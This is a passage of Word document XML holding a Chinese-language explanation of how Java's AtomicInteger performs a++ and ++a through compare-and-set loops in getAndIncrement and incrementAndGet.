      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作是如何实现的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:rStyle w:val="tracking-ad"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>[java]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId177" w:tooltip="view plain" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>view plain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId178" w:tgtFrame="_blank" w:tooltip="copy" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>copy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId179" w:tgtFrame="_blank" w:tooltip="print" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>print</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId180" w:tooltip="?" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> getAndIncrement() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (;;) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> current = get();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> next = current + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (compareAndSet(current, next))  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> current;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>几乎和最开始的实例一模一样，也是采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作来实现自增操作的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>++a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作类似，只不过返回结果不同罢了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:rStyle w:val="tracking-ad"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>[java]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId181" w:tooltip="view plain" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>view plain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId182" w:tgtFrame="_blank" w:tooltip="copy" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>copy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId183" w:tgtFrame="_blank" w:tooltip="print" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>print</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId184" w:tooltip="?" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> incrementAndGet() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (;;) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> current = get();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> next = current + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
